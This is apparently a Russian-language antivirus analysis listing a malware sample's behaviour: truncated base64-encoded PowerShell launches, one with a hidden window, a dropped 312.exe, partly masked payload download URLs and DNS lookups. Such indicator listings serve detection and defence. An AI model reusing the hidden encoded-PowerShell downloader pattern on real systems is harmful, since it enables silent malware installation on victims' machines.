Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAFgAUgBWAEUAZgByAHIAPQAnAFgARwBEAEYATQB1AG4AcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAWQBQAFIATwBgAFQAbwBDAGAATwBsACIAIAA9AC...
- %HOMEPATH%\312.exe
- %HOMEPATH%\312.exe
- http://la####anemusic.com/uploads/ih_03_krekp/
- http://la###c.com.br/rkz_wgz_2mw77xw/
- DNS ASK ko##aci.com
- DNS ASK la####anemusic.com
- DNS ASK ki###nime24.com
- DNS ASK qi###long.com
- DNS ASK yo###nzixue.com
- DNS ASK la###c.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAFgAUgBWAEUAZgByAHIAPQAnAFgARwBEAEYATQB1AG4AcwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAHIASQBgAFQAWQBQAFIATwBgAFQAbwBDAGAATwBsACIAIAA9AC...' (со скрытым окном)